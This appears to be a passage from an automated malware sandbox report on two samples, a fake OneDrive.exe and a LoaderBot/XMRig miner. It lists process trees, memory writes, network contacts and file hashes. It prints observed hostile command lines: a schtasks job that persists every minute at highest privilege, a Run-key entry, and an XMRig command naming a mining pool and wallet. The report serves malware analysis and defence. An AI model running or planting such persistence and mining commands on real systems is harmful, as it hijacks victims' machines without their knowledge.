PID 1112 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 1112 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 108 wrote to memory of 1012 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
PID 108 wrote to memory of 1012 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
PID 108 wrote to memory of 1012 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
PID 108 wrote to memory of 868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
PID 108 wrote to memory of 868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
PID 108 wrote to memory of 868 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
PID 868 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 868 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 868 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 868 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 868 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 868 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 868 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 868 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 868 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 868 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 868 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 108 wrote to memory of 1088 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
PID 108 wrote to memory of 1088 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
PID 108 wrote to memory of 1088 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

Processes

C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe

"C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /sc minute /mo 1 /tn OneDrive /rl HIGHEST /tr C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe YmMxcTVjZHZ1N3RlN2xmaDBkOWR4ZndoYTdmNXBzaHl2ZnB0NXVhaGVkLDQ0RHM4ZmJDM0hXUUNjd1FvdGdyTkRVV25tRGl4cFFQRzdZTGg1aDJyelNNUXJ4Q1JYZVNqUXZIOExSUE5HU3lxdlhjS2VFazN1bVo3VDJ3ekZBZ292RjE1VWNrQnhnLDB4MDNlQmFCNjg0ZDNmYjI0QmVERmMzMWREYTRGNTVjQzAyMkU1NzEwMSxYbURTUU1tVjV2eGo4Y3U4eFNraFVjZldmRndtc0FZdDNpLHIzeUExd2VvUlc1THdNY0xoelBvdG1xU3huMjRFNzZXdWgsRFNSRDd6WEtOVXJZZmtpUERTdTFYRFdyZ2dkRTlTTGNRVyxMVVE5SmVHMkpOOUQ1VHRLdnlQRFZ6cWpTUjV4V0h4a3VRLFRQc0xGMmVUVHExMTJVS2Vvb0xWNHFBZzN0b3lDNWg2VE0sR0FZSjZOVkxKM1ZZRVRGVU5JNkxBRDVFREVQRTVEUFhaV1dRUEZWNFlIRkdIU0YzNkc0TENSUE4sQVZENjlIZHF1WEJ1RWpma0FEV0JDcXM1bmVWQ2VXQjMxZyxxcHQ5bXNqaDN0N3VjOTJwbmx3a3NtOWRkbjJrcWhtNmc1ZjQzbWUyZHAsYWRkcjFxeWYyc244dWF6N2o0NDB2ZXM5NmFkZHB1ZWFtOGY5cjlndTh2NDVsc2p4bGw3cWo0cHgwZTY5YTl0MjdlbnF0NDY2NnJlbm1rd2oyeDIzY3dldGZscHlkbGx1cWtwOWszbix0MVNrUzJrS0dvSnRqcHFhUGVWQlltc2JHcXMyR1ZkMWRzbSxHUEpkSk5GS0RORjFKcnZORG5tUXRqNHA1cVJpNWRmWmo1LDEyaEc4S2V3VmtoS1JIZUhmWVFlZEpMSHViWWliTGNBa1h1bjc1ckY0Yld5OVJrUA==

C:\Windows\system32\taskeng.exe

taskeng.exe {C3D27779-9F9E-400A-8C25-E38F8BB55C9F} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe YmMxcTVjZHZ1N3RlN2xmaDBkOWR4ZndoYTdmNXBzaHl2ZnB0NXVhaGVkLDQ0RHM4ZmJDM0hXUUNjd1FvdGdyTkRVV25tRGl4cFFQRzdZTGg1aDJyelNNUXJ4Q1JYZVNqUXZIOExSUE5HU3lxdlhjS2VFazN1bVo3VDJ3ekZBZ292RjE1VWNrQnhnLDB4MDNlQmFCNjg0ZDNmYjI0QmVERmMzMWREYTRGNTVjQzAyMkU1NzEwMSxYbURTUU1tVjV2eGo4Y3U4eFNraFVjZldmRndtc0FZdDNpLHIzeUExd2VvUlc1THdNY0xoelBvdG1xU3huMjRFNzZXdWgsRFNSRDd6WEtOVXJZZmtpUERTdTFYRFdyZ2dkRTlTTGNRVyxMVVE5SmVHMkpOOUQ1VHRLdnlQRFZ6cWpTUjV4V0h4a3VRLFRQc0xGMmVUVHExMTJVS2Vvb0xWNHFBZzN0b3lDNWg2VE0sR0FZSjZOVkxKM1ZZRVRGVU5JNkxBRDVFREVQRTVEUFhaV1dRUEZWNFlIRkdIU0YzNkc0TENSUE4sQVZENjlIZHF1WEJ1RWpma0FEV0JDcXM1bmVWQ2VXQjMxZyxxcHQ5bXNqaDN0N3VjOTJwbmx3a3NtOWRkbjJrcWhtNmc1ZjQzbWUyZHAsYWRkcjFxeWYyc244dWF6N2o0NDB2ZXM5NmFkZHB1ZWFtOGY5cjlndTh2NDVsc2p4bGw3cWo0cHgwZTY5YTl0MjdlbnF0NDY2NnJlbm1rd2oyeDIzY3dldGZscHlkbGx1cWtwOWszbix0MVNrUzJrS0dvSnRqcHFhUGVWQlltc2JHcXMyR1ZkMWRzbSxHUEpkSk5GS0RORjFKcnZORG5tUXRqNHA1cVJpNWRmWmo1LDEyaEc4S2V3VmtoS1JIZUhmWVFlZEpMSHViWWliTGNBa1h1bjc1ckY0Yld5OVJrUA==

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

Network

Country Destination Domain Proto
RU 31.41.244.231:80 tcp
RU 31.41.244.231:80 tcp

Files

memory/1176-54-0x0000000000000000-mapping.dmp

memory/1112-55-0x00000000003B0000-0x00000000009FF000-memory.dmp

memory/908-56-0x00000000FF220000-0x00000000FF3BF000-memory.dmp

memory/908-57-0x00000000FF220000-0x00000000FF3BF000-memory.dmp

memory/908-59-0x00000000FF220000-0x00000000FF3BF000-memory.dmp

memory/908-61-0x00000000FF220000-0x00000000FF3BF000-memory.dmp

memory/908-63-0x00000000FF220000-0x00000000FF3BF000-memory.dmp

memory/908-64-0x00000000FF220000-0x00000000FF3BF000-memory.dmp

memory/908-66-0x00000000FF220000-0x00000000FF3BF000-memory.dmp

memory/908-67-0x00000000FF220000-0x00000000FF3BF000-memory.dmp

memory/908-68-0x00000000FF27C6E0-mapping.dmp

memory/908-73-0x00000000FF220000-0x00000000FF3BF000-memory.dmp

memory/908-78-0x00000000FF220000-0x00000000FF3BF000-memory.dmp

memory/1112-79-0x00000000003B0000-0x00000000009FF000-memory.dmp

\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

MD5 9ec8bc3dbfdcfe1540bd3274181ae9bb
SHA1 a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316
SHA256 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942
SHA512 d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117

memory/1012-83-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

MD5 9ec8bc3dbfdcfe1540bd3274181ae9bb
SHA1 a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316
SHA256 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942
SHA512 d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

MD5 9ec8bc3dbfdcfe1540bd3274181ae9bb
SHA1 a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316
SHA256 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942
SHA512 d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

MD5 9ec8bc3dbfdcfe1540bd3274181ae9bb
SHA1 a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316
SHA256 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942
SHA512 d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117

memory/1012-85-0x0000000000C70000-0x00000000012BF000-memory.dmp

memory/1112-86-0x00000000003B0000-0x00000000009FF000-memory.dmp

memory/108-87-0x0000000002780000-0x0000000002DCF000-memory.dmp

\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

MD5 9ec8bc3dbfdcfe1540bd3274181ae9bb
SHA1 a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316
SHA256 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942
SHA512 d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117

memory/868-89-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

MD5 9ec8bc3dbfdcfe1540bd3274181ae9bb
SHA1 a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316
SHA256 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942
SHA512 d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117

memory/868-91-0x0000000000C70000-0x00000000012BF000-memory.dmp

memory/840-104-0x00000000FF27C6E0-mapping.dmp

memory/868-115-0x0000000000C70000-0x00000000012BF000-memory.dmp

memory/868-116-0x0000000000C70000-0x00000000012BF000-memory.dmp

\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

MD5 9ec8bc3dbfdcfe1540bd3274181ae9bb
SHA1 a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316
SHA256 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942
SHA512 d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117

memory/1088-118-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

MD5 9ec8bc3dbfdcfe1540bd3274181ae9bb
SHA1 a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316
SHA256 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942
SHA512 d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117

memory/1088-120-0x0000000000F00000-0x000000000154F000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win10v2004-20220901-en

Max time kernel

152s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe"

Signatures

LoaderBot

loader miner loaderbot

xmrig

miner xmrig

LoaderBot executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Usermode.exe" C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A

Enumerates physical storage devices

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1708 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\Usermode.exe
PID 1708 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\Usermode.exe
PID 1708 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\Usermode.exe
PID 1708 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1708 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1708 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1708 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Windows\SysWOW64\cmd.exe
PID 1264 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp
PID 1264 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp
PID 1264 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp
PID 4752 wrote to memory of 3092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4752 wrote to memory of 3092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4752 wrote to memory of 3092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4872 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 4872 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Processes

C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe

"C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe"

C:\Users\Admin\AppData\Local\Temp\Usermode.exe

"C:\Users\Admin\AppData\Local\Temp\Usermode.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping -n 3 127.0.0.1 & copy /Y "C:\Users\Admin\AppData\Local\Temp\setup.exe" "C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp" /SL5="$D0054,2411950,352768,C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 86VwoTuZTDgF5trS4bcEkvXtoHhUySbTWaWD5K4chXXc6XEPtWSVJcB43EVa9fmhPwcXRDNJ1hY21QqQtH3MQShV1F4VWrX -p x -k -v=0 --donate-level=1 -t 1

Network

Country Destination Domain Proto
US 8.253.135.112:80 tcp
US 8.253.135.112:80 tcp
US 13.107.21.200:443 tcp
US 8.8.8.8:53 pool.supportxmr.com udp
FR 141.94.96.71:3333 pool.supportxmr.com tcp
NL 104.80.225.205:443 tcp
US 20.189.173.4:443 tcp
NL 178.79.208.1:80 tcp
NL 178.79.208.1:80 tcp
NL 178.79.208.1:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Usermode.exe

MD5 c08501fa8eca8770f56a14bee65ca31a
SHA1 1631125fef2594684dceed63455c7816c5ce1e46
SHA256 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385
SHA512 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025

memory/4872-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Usermode.exe

MD5 c08501fa8eca8770f56a14bee65ca31a
SHA1 1631125fef2594684dceed63455c7816c5ce1e46
SHA256 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385
SHA512 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 df0fd86748ba867a58e017bb2311990f
SHA1 d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e
SHA256 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4
SHA512 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 df0fd86748ba867a58e017bb2311990f
SHA1 d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e
SHA256 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4
SHA512 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb

memory/4752-138-0x0000000000000000-mapping.dmp

memory/1264-135-0x0000000000000000-mapping.dmp

memory/1264-139-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4872-141-0x00000000009A0000-0x0000000000E50000-memory.dmp

memory/3092-143-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp

MD5 36da68f5c3a7fe4dd3f589941160ac85
SHA1 71c610db1bc62c9af3d23f819433a6cd89432fe8
SHA256 95883809e3356924097775a13407a43bcf48aca640b7d795ea2ef4e2d261285e
SHA512 56c3431cab652fda44c4a102f8d16ccd7b9f96aebdb1a63bfc9c6f5e0dec99607562574f40e5e7a8666d8d5f76b6b4d8e8baef1b0629f1f64cf32786f8fb146c

C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp

MD5 36da68f5c3a7fe4dd3f589941160ac85
SHA1 71c610db1bc62c9af3d23f819433a6cd89432fe8
SHA256 95883809e3356924097775a13407a43bcf48aca640b7d795ea2ef4e2d261285e
SHA512 56c3431cab652fda44c4a102f8d16ccd7b9f96aebdb1a63bfc9c6f5e0dec99607562574f40e5e7a8666d8d5f76b6b4d8e8baef1b0629f1f64cf32786f8fb146c

memory/2208-142-0x0000000000000000-mapping.dmp

memory/2208-148-0x0000000003370000-0x00000000033E7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\ISDone.dll

MD5 f26684a0b0999413be6751f335603471
SHA1 dcd054328740c4bbf00e11b0b8f00a00f311898d
SHA256 44e56185af5aae005e0298397e75ba0792a9cbb61341ddf07635536c62630890
SHA512 d1358b7142ca466a3ad17f09cdc283546aad9ebc454abf06f7673d46e4c5c59280d0bc673b4bdc557e3032d27aa261667de4284e9fc7d46aba64f89da807df3e

C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\ISDone.dll

MD5 f26684a0b0999413be6751f335603471
SHA1 dcd054328740c4bbf00e11b0b8f00a00f311898d
SHA256 44e56185af5aae005e0298397e75ba0792a9cbb61341ddf07635536c62630890
